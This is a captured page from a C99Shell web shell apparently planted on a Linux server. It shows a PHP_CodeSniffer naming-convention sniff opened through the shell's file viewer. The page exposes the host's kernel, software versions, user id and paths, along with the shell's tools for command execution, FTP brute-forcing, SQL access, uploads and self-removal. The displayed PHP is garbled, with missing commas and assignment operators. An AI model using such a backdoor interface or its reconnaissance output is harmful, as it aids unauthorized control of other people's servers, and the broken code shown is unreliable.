!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/php/3ros/PHP_CodeSniffer/CodeSniffer/Standards/PEAR/Sniffs/NamingConventions/   drwxr-xr-x
Free 11.78 GB of 61.93 GB (19.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ValidVariableNameSniff.php (3.67 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * PEAR_Sniffs_NamingConventions_ValidVariableNameSniff.
 *
 * PHP version 5
 *
 * @category  PHP
 * @package   PHP_CodeSniffer
 * @author    Greg Sherwood <gsherwood@squiz.net>
 * @copyright 2006 Squiz Pty Ltd (ABN 77 084 670 600)
 * @license   http://matrix.squiz.net/developer/tools/php_cs/licence BSD Licence
 * @version   CVS: $Id: ValidVariableNameSniff.php,v 1.2 2008/06/13 04:10:43 squiz Exp $
 * @link      http://pear.php.net/package/PHP_CodeSniffer
 */

if (class_exists('PHP_CodeSniffer_Standards_AbstractVariableSniff'true) === false) {
    
$error 'Class PHP_CodeSniffer_Standards_AbstractVariableSniff not found';
    throw new 
PHP_CodeSniffer_Exception($error);
}

/**
 * PEAR_Sniffs_NamingConventions_ValidVariableNameSniff.
 *
 * Checks the naming of member variables.
 *
 * @category  PHP
 * @package   PHP_CodeSniffer
 * @author    Greg Sherwood <gsherwood@squiz.net>
 * @copyright 2006 Squiz Pty Ltd (ABN 77 084 670 600)
 * @license   http://matrix.squiz.net/developer/tools/php_cs/licence BSD Licence
 * @version   Release: 1.1.0
 * @link      http://pear.php.net/package/PHP_CodeSniffer
 */
class PEAR_Sniffs_NamingConventions_ValidVariableNameSniff extends PHP_CodeSniffer_Standards_AbstractVariableSniff
{


    
/**
     * Processes class member variables.
     *
     * @param PHP_CodeSniffer_File $phpcsFile The file being scanned.
     * @param int                  $stackPtr  The position of the current token
     *                                        in the stack passed in $tokens.
     *
     * @return void
     */
    
protected function processMemberVar(PHP_CodeSniffer_File $phpcsFile$stackPtr)
    {
        
$tokens $phpcsFile->getTokens();

        
$memberProps $phpcsFile->getMemberProperties($stackPtr);
        if (empty(
$memberProps) === true) {
            return;
        }

        
$memberName     ltrim($tokens[$stackPtr]['content'], '$');
        
$isPublic       = ($memberProps['scope'] === 'private') ? false true;
        
$scope          $memberProps['scope'];
        
$scopeSpecified $memberProps['scope_specified'];

        
// If it's a private member, it must have an underscore on the front.
        
if ($isPublic === false && $memberName{0} !== '_') {
            
$error "Private member variable \"$memberName\" must be prefixed with an underscore";
            
$phpcsFile->addError($error$stackPtr);
            return;
        }

        
// If it's not a private member, it must not have an underscore on the front.
        
if ($isPublic === true && $scopeSpecified === true && $memberName{0} === '_') {
            
$error ucfirst($scope)." member variable \"$memberName\" must not be prefixed with an underscore";
            
$phpcsFile->addError($error$stackPtr);
            return;
        }

    }
//end processMemberVar()


    /**
     * Processes normal variables.
     *
     * @param PHP_CodeSniffer_File $phpcsFile The file where this token was found.
     * @param int                  $stackPtr  The position where the token was found.
     *
     * @return void
     */
    
protected function processVariable(PHP_CodeSniffer_File $phpcsFile$stackPtr)
    {
        
// We don't care about normal variables.
        
return;

    }
//end processVariable()


    /**
     * Processes variables in double quoted strings.
     *
     * @param PHP_CodeSniffer_File $phpcsFile The file where this token was found.
     * @param int                  $stackPtr  The position where the token was found.
     *
     * @return void
     */
    
protected function processVariableInString(PHP_CodeSniffer_File $phpcsFile$stackPtr)
    {
        
// We don't care about normal variables.
        
return;

    }
//end processVariableInString()


}//end class

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.5103 ]--